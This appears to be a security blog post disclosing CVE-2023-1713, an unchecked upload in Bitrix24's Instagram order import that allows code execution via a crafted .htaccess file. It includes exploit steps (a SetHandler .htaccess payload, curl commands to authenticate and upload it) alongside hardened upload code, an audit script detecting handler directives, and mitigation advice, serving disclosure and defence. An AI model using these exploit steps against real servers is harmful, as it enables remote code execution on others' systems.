A critical security vulnerability has been disclosed in Bitrix24 22.0.300, a platform widely used for CRM, file and document management, and collaboration. The vulnerability, tracked as CVE-2023-1713, lies in the Instagram order import functionality (bitrix/modules/crm/lib/order/import/instagram.php) and allows a remote authenticated attacker to execute arbitrary code by uploading a crafted ".htaccess" file.

In this post we walk through the technical details of the vulnerability and how an attacker can exploit it, and we provide a sample code snippet for security researchers to analyze.

Vulnerability Details

The vulnerability stems from insecure creation of a temporary file in instagram.php: uploaded data is written to disk before it is processed, and the write lacks proper validation of the file's name, location and contents. Because Apache reads per-directory configuration from a file named ".htaccess", an attacker who can get the server to write such a file into a directory it serves can change how every file in that directory is handled. An authenticated attacker could therefore upload a malicious ".htaccess", have subsequent uploads treated as executable PHP, and execute arbitrary code on the server.

The snippet below is a simplified illustration of the file creation pattern in bitrix/modules/crm/lib/order/import/instagram.php: the raw request body is written to a temporary file with no checks on its size or contents. Note that tempnam() as called here picks a random name in the system temporary directory, so the snippet shows only the unchecked write; the exploitability described above additionally depends on the file landing in a directory Apache serves, under a name the attacker can influence, which this simplified version does not show.

// Read the raw request body (attacker-controlled) with no size limit
$uploadData = file_get_contents('php://input');
// Create a temporary file; tempnam() chooses the name (empty prefix here)
$tmpfname = tempnam(sys_get_temp_dir(), "");
// Write the body to disk verbatim: no validation of contents or destination
$handle = fopen($tmpfname, "w");
fwrite($handle, $uploadData);
fclose($handle);
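As an added example that is not part of the original post or of Bitrix24's code, the raw-body-to-temp-file pattern above is shown next to a hardened version. It assumes a hypothetical client-supplied file name ($requestedName), a hypothetical import directory outside the web root, and that the import payload is JSON; none of these details come from the post.

```php
<?php
// Added example (not Bitrix24 code): the insecure "write the request body to a
// temp file" pattern from the post, beside a hardened version.
// Assumptions (not from the original post): the import receives a client-supplied
// file name in $requestedName, UPLOAD_DIR is outside the web root, and the
// payload is JSON.
declare(strict_types=1);

const UPLOAD_DIR = '/var/lib/bitrix-import';   // assumed: NOT under the web root

/**
 * Insecure pattern (as in the post): the body is written to disk with no size,
 * name or content checks. If the destination were web-served and the name
 * attacker-controlled, ".htaccess" could land where Apache reads it.
 */
function storeImportInsecure(string $body): string
{
    $tmp = tempnam(sys_get_temp_dir(), '');
    file_put_contents($tmp, $body);
    return $tmp;
}

/**
 * Hardened version:
 *  - the on-disk name is generated server-side; the client name is only
 *    validated, never used as the file name;
 *  - dotfiles (.htaccess, .user.ini, ...) and path separators are rejected;
 *  - the file is created exclusively ('x' mode) with mode 0600 in a
 *    non-web directory;
 *  - the body is bounded and must parse as the expected format (JSON here).
 */
function storeImportSecure(string $body, string $requestedName, string $dir = UPLOAD_DIR): string
{
    if (strlen($body) === 0 || strlen($body) > 5 * 1024 * 1024) {
        throw new InvalidArgumentException('import body has an invalid size');
    }
    // Reject anything that is not a plain, non-hidden base name.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/', $requestedName)
        || strpos($requestedName, '..') !== false) {
        throw new InvalidArgumentException('rejected file name');
    }
    // Validate the payload as data, not as something the web server might execute.
    json_decode($body, true, 64, JSON_THROW_ON_ERROR);

    if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
        throw new RuntimeException('cannot create import directory');
    }
    // Server-chosen random name; 'x' fails if the file already exists.
    $path = $dir . '/' . bin2hex(random_bytes(16)) . '.json';
    $fh = fopen($path, 'x');
    if ($fh === false) {
        throw new RuntimeException('could not create import file');
    }
    chmod($path, 0600);
    fwrite($fh, $body);
    fclose($fh);
    return $path;
}

// Demo with a constructed request body and constructed attacker-supplied names.
$demoDir = sys_get_temp_dir() . '/import-demo';
$good = '{"orders":[{"id":1}]}';
echo storeImportSecure($good, 'orders.json', $demoDir), "\n";
foreach (['.htaccess', '../x.php'] as $bad) {
    try {
        storeImportSecure($good, $bad, $demoDir);
    } catch (InvalidArgumentException $e) {
        echo "$bad: ", $e->getMessage(), "\n";
    }
}
```

The important design point is that the client never chooses the on-disk name and the directory is never served by Apache, so a ".htaccess" in the request body is just bytes in a JSON file that fails to parse.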

Exploit Information

To exploit this vulnerability, a remote authenticated attacker uploads a crafted ".htaccess" file containing malicious server directives, for example:

<FilesMatch ".+">
SetHandler application/x-httpd-php
</FilesMatch>


Apache honours a ".htaccess" file only in directories where AllowOverride permits it (SetHandler requires the FileInfo override). Where it does, the directive above makes Apache run every file in that directory and its subdirectories through the PHP handler regardless of extension, so any file the attacker subsequently uploads with embedded PHP code executes as soon as it is requested over HTTP; other directives can be used to manipulate the server's behaviour in similar ways.

Craft a malicious ".htaccess" file

echo '<FilesMatch ".+">SetHandler application/x-httpd-php</FilesMatch>' > malicious.htaccess

Authenticate with Bitrix24

# the token endpoint answers with JSON; extract the access_token field
auth_token=$(curl -s -X POST 'https://your.bitrix24.instance/oauth/token/' -d 'client_id=YOUR_CLIENT_ID&client_secret=YOUR_CLIENT_SECRET&grant_type=authorization_code&scope=web&redirect_uri=YOUR_REDIRECT_URI&code=YOUR_AUTH_CODE' | jq -r .access_token)

Upload the malicious ".htaccess" as an Instagram import

curl -X POST "https://your.bitrix24.instance/rest/crm.instagram.import/" -H "Authorization: Bearer $auth_token" --upload-file malicious.htaccess

Original References

- CVE Database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1713
- Bitrix24 Patch Release Notes: https://www.bitrix24.com/about/b24/changelog/#patch22..300
- Apache HTTP Server Documentation: https://httpd.apache.org/docs/current/mod/core.html#filesmatch

Mitigation

To prevent exploitation, administrators of Bitrix24 instances should promptly update to a release newer than 22.0.300 that contains the Bitrix patch. Until the update is applied, make sure the directories the import writes to are not served by Apache, and set AllowOverride None (and disable the PHP handler) for any directory that accepts uploads, so that an attacker-supplied ".htaccess" is ignored.

Additionally, administrators should regularly review and audit their server configuration, upload directories and user access permissions to ensure they remain secure and are not exposed to similar vulnerabilities.
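As an added example (not from the original post or from Bitrix24), the following PHP script implements the upload-directory audit suggested above: it walks a directory tree and reports every ".htaccess" line containing a directive that changes how stored files are handled, which is what the exploit above relies on. The directive list and the sample directory layout are constructed for the demo.

```php
<?php
// Added example (not Bitrix24 code): audit upload directories for .htaccess
// files that change how Apache handles the files stored there.
declare(strict_types=1);

// Directives that can turn stored data into executed code or alter PHP
// settings. Assumed list for this demo; extend it for your environment.
const HANDLER_PATTERN = '/\b(SetHandler|AddHandler|AddType|php_(?:admin_)?(?:value|flag))\b/i';

/**
 * Walk $root and return one entry per suspicious .htaccess line:
 * ['file' => path, 'line' => 1-based line number, 'text' => directive line].
 */
function findDangerousHtaccess(string $root): array
{
    $hits = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        if ($file->getFilename() !== '.htaccess') {
            continue;
        }
        $lines = file($file->getPathname(), FILE_IGNORE_NEW_LINES);
        if ($lines === false) {
            continue;
        }
        foreach ($lines as $index => $line) {
            $trimmed = trim($line);
            // Skip blanks and comments; Apache ignores them too.
            if ($trimmed === '' || $trimmed[0] === '#') {
                continue;
            }
            if (preg_match(HANDLER_PATTERN, $trimmed)) {
                $hits[] = [
                    'file' => $file->getPathname(),
                    'line' => $index + 1,
                    'text' => $trimmed,
                ];
            }
        }
    }
    return $hits;
}

// Constructed demo layout: one benign and one malicious .htaccess.
$root = sys_get_temp_dir() . '/htaccess-audit-demo';
@mkdir("$root/avatars", 0700, true);
@mkdir("$root/import", 0700, true);
file_put_contents("$root/avatars/.htaccess", "# static assets only\nOptions -Indexes\n");
file_put_contents(
    "$root/import/.htaccess",
    "<FilesMatch \".+\">SetHandler application/x-httpd-php</FilesMatch>\n"
);

// Only the import/.htaccess line is reported.
foreach (findDangerousHtaccess($root) as $hit) {
    printf("%s:%d: %s\n", $hit['file'], $hit['line'], $hit['text']);
}
```

Run it from cron against every directory that stores user uploads; a hit in a directory where AllowOverride is anything other than None should be treated as an incident, not a configuration drift.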

Conclusion

CVE-2023-1713 is a critical remote code execution vulnerability in Bitrix24 22.0.300 with potentially severe consequences for affected deployments. Users and administrators should promptly update their instances to a release containing the patch and continue to maintain a secure environment.

Timeline

Published on: 11/01/2023 10:15:08 UTC
Last modified on: 11/09/2023 20:37:42 UTC